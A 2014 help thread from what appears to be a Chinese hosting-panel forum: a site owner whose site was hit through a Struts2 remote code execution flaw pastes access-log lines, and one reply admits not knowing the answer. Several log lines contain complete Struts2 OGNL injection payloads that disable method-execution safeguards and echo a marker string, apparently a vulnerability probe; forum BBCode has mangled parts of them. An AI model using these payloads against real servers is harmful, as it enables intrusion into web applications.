Rank: 2

1^# 跳转到 » 倒序看帖

字体大小: tT

发表于 2014-9-24 10:00 | 只看该作者

提问三步曲: 提问先看教程/FAQ索引(wdcp,wdcp_v3,一键包)及搜索,会让你更快解决问题
1 提供详细，如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等

温馨提示：信息不详,很可能会没人理你！论坛有教程说明的，也可能没人理！因为,你懂的

[求助] 我的站被struts2远程代码执行漏洞简要回顾

我的站被这个搞了，截取一段日志，不是很懂，老大来看看，是 [tr][/tr]

当前版本: wdcp_v2.5.10(20140213) 最新
wdcp_v2.5.10(20140213)
更新日志

220.181.165.11 - - [23/Sep/2014:08:00:37 +0800] "GET /news/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 18573
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_mishouhuan/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9085
220.181.165.132 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_shengdian/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9094
220.181.165.134 - - [23/Sep/2014:08:00:38 +0800] "POST /news/ HTTP/1.1" 200 18573
220.181.165.4 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_ram/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 7861
222.85.129.139 - - [23/Sep/2014:08:00:38 +0800] "GET /shuaji/77925.html HTTP/1.1" 200 5816
223.104.13.16 - - [23/Sep/2014:08:00:36 +0800] "GET /uploads/image/20130916/20130916074137_94932.jpg HTTP/1.1" 200 53333
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_mishouhuan/ HTTP/1.1" 200 9085
220.181.165.135 - - [23/Sep/2014:08:00:38 +0800] "GET /new/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 301 841
220.181.165.9 - - [23/Sep/2014:08:00:38 +0800] "GET /softs/bixu/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9080
220.181.165.8 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_ram/ HTTP/1.1" 200 7861
218.81.235.186 - - [23/Sep/2014:08:00:38 +0800] "GET /js/grey.png HTTP/1.1" 200 3410

AI导航网，AI网站大全，AI工具大全，AI软件大全，AI工具集合，AI编程，AI绘画，AI写作，AI视频生成，AI对话聊天等，尽在aiaiV.cn

yangjiangh

新手上路

Rank: 1

2^#

发表于 2014-9-24 18:44 | 只看该作者

我也不清楚不知道有没有交流论坛呢？

piis.cn

TOP

返回列表

[求助] 我的站被struts2远程代码执行漏洞简要回顾

[收藏此主题] [关注此主题的新回复]

[通过 QQ、MSN 分享给朋友]